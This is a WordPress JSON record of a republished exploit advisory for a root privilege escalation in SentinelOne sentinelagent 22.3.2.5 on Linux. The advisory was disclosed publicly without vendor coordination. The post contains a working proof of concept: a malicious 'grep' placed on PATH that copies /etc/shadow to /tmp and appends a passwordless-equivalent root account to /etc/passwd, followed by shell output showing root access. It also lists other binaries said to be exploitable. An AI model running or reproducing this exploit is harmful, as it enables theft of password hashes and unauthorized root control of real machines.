{"id":34506,"date":"2022-12-07T18:08:24","date_gmt":"2022-12-07T15:08:24","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/170128\/sentinelone-escalate.txt"},"modified":"2022-12-11T10:17:51","modified_gmt":"2022-12-11T06:47:51","slug":"sentinelone-sentinelagent-22-3-2-5-privilege-escalation","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/sentinelone-sentinelagent-22-3-2-5-privilege-escalation\/","title":{"rendered":"SentinelOne sentinelagent 22.3.2.5 Privilege Escalation"},"content":{"rendered":"<p dir=\"ltr\">Exploit Title: SentinelOne sentinelagent (linux) root Privilege Escalation zero day vulnerability<br \/>\nDate: 12\/06\/2022<br \/>\nExploit Author: ouch_this_hurts<br \/>\nVendor Homepage: https:\/\/www.sentinelone.com\/<br \/>\nSoftware Link: https:\/\/assets.sentinelone.com\/prod\/s1-linux-agent-datas<br \/>\nVersion: 22.3.2.5<br \/>\nTested on: Ubuntu 22.04.x<br \/>\nCVE: NA<\/p>\n<p dir=\"ltr\">Not enough AI in the world can help you write secure software it seems? The vendor doesnt make reporting vulnerabilities easy, so to exploit-db it goes :)<\/p>\n<p dir=\"ltr\">Protips:<br \/>\n&#8211; If I Google you, and I cannot find an easy way to report the vulnerability, I&#8217;m not going to bother.<br \/>\n&#8211; If you require me to use HackerOne, I&#8217;m not going to bother.<br \/>\n&#8211; If you dont have a security.txt, how do you expect me to contact you?<\/p>\n<p dir=\"ltr\">Get `root` on a system with `sentinelagent&lt;=22.3.2.5` with one simple trick:<\/p>\n<p dir=\"ltr\">Override `grep` in the `PATH` with your malicious code. Reboot. pwnd. Nice!<\/p>\n<p dir=\"ltr\">PoC below:<br \/>\n1. Find the systems &#8220;earliest&#8221; `PATH`, or just override it to whatever you want in `\/etc\/environment` with some other staged exploit.<br \/>\n2. Create the following `grep` file in that directory and make sure its executable:<\/p>\n<p dir=\"ltr\">&#8220;`shell<br \/>\ncat &lt;&lt; SENTINELOOPS &gt; \/usr\/local\/bin\/grep<br \/>\n#!\/bin\/bash<br \/>\n# I think I&#8217;ll have the passwds pl0x<br \/>\ncat \/etc\/shadow &gt; \/tmp\/etc_shadow<\/p>\n<p dir=\"ltr\"># password is password :)<br \/>\necho &#8216;sentinel_oops:\\$1\\$user1\\$WuzQ29wbcMN09VLW7X0\/q1:0:0::\/root:\/bin\/sh&#8217; &gt;&gt; \/etc\/passwd<br \/>\nSENTINELOOPS<\/p>\n<p dir=\"ltr\">chmod +x \/usr\/local\/bin\/grep<br \/>\n&#8220;`<\/p>\n<p dir=\"ltr\">3. Wait for machine to reboot, login as `sentinel_oops:password` :)<\/p>\n<p dir=\"ltr\">&#8220;`<br \/>\n$ su sentinel_oops<br \/>\nPassword:<br \/>\n# whoami<br \/>\nroot<br \/>\n&#8220;`<\/p>\n<p dir=\"ltr\">What actually happened here? On `sentinelagent` start it runs `sh -c &#8220;grep&#8230;.&#8221;`.<\/p>\n<p dir=\"ltr\">So there are potentially other ways of privilege escalation via this &#8220;agent&#8221;?<br \/>\n&#8211; `grep` as demonstrated above<br \/>\n&#8211; `pgrep` examining the binary appears to be vulnerable<br \/>\n&#8211; `xargs` examining the binary appears to be vulnerable<br \/>\n&#8211; `cat` examining the binary appears to be vulnerable<br \/>\n&#8211; `pgrep` examining the binary appears to be vulnerable<br \/>\n&#8211; `ldd` examining the binary appears to be vulnerable<br \/>\n&#8211; `lsmod` examining the binary appears to be vulnerable<br \/>\n&#8211; `mksh` examining the binary appears to be vulnerable<br \/>\n&#8211; `awk` examining the binary appears to be vulnerable<\/p>\n<p dir=\"ltr\">[CWE-427](https:\/\/cwe.mitre.org\/data\/definitions\/427.html) and [how to write secure software](https:\/\/youtu.be\/RfiQYRn7fBg?t=16)<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Exploit Title: SentinelOne sentinelagent (linux) root Privilege Escalation zero day vulnerability Date: 12\/06\/2022 Exploit Author: ouch_this_hurts Vendor Homepage: https:\/\/www.sentinelone.com\/ Software Link: https:\/\/assets.sentinelone.com\/prod\/s1-linux-agent-datas Version: 22.3.2.5 Tested on: Ubuntu 22.04.x CVE: NA Not enough AI in the world can help you write secure software it seems? The vendor doesnt make reporting vulnerabilities easy, so to exploit-db it &hellip;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-34506","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/34506","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=34506"}],"version-history":[{"count":1,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/34506\/revisions"}],"predecessor-version":[{"id":34702,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/34506\/revisions\/34702"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=34506"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=34506"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=34506"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}